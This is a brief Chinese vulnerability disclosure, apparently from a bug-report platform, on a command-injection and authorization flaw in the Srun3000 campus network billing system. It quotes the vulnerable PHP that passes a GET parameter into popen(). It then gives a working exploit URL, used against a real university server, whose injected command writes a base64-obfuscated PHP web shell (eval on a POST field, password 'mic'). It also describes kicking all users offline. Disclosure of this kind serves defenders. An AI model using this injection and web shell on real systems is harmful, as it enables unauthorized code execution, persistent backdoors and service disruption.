Srun3000一处越权&命令执行&get...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 深澜一处命令执行 越权 之前没实例不给通过现在附一个 河北某大学的 ### 详细说明: 先看源码,简单粗暴命令执行,但是没给审核,于是就有了后文 ``` switch ( $_GET['action'] ) { case "drop_user" : if ( $_GET['ipv'] == "ipv4" ) { if ( $_GET['uname1'] == "-all" ) { $pfd = popen( "/srun3/bin/online_user -4 -d ".$_GET['uname1'], "r" ); //命令执行 } else { $pfd = popen( "/srun3/bin/online_user -4 -D ".$_GET['uname1'], "r" ); udp_send( $_GET['ip'], 10333, "0&您已被强制断线" ); } }} } ``` ### 漏洞证明: 实例中srun3000部署在内网。于是通过dmz一台主机代理访问测试。 根据源码 http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=1|echo "<?php file_put_contents(base64_decode(L3NydW4zL3dlYi9taWMucGhw'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydtaWMnXSk7Pz4='));?>">/srun3/web/1.php 写上去1.php 访问生成mic.php 密码mic (已删除) [<img src="https://images.seebug.org/upload/201405/2511590699de98602a4a71e846677b49d021d902.png" alt="web.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2511590699de98602a4a71e846677b49d021d902.png) 还有越权 可以踢掉所有人。...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息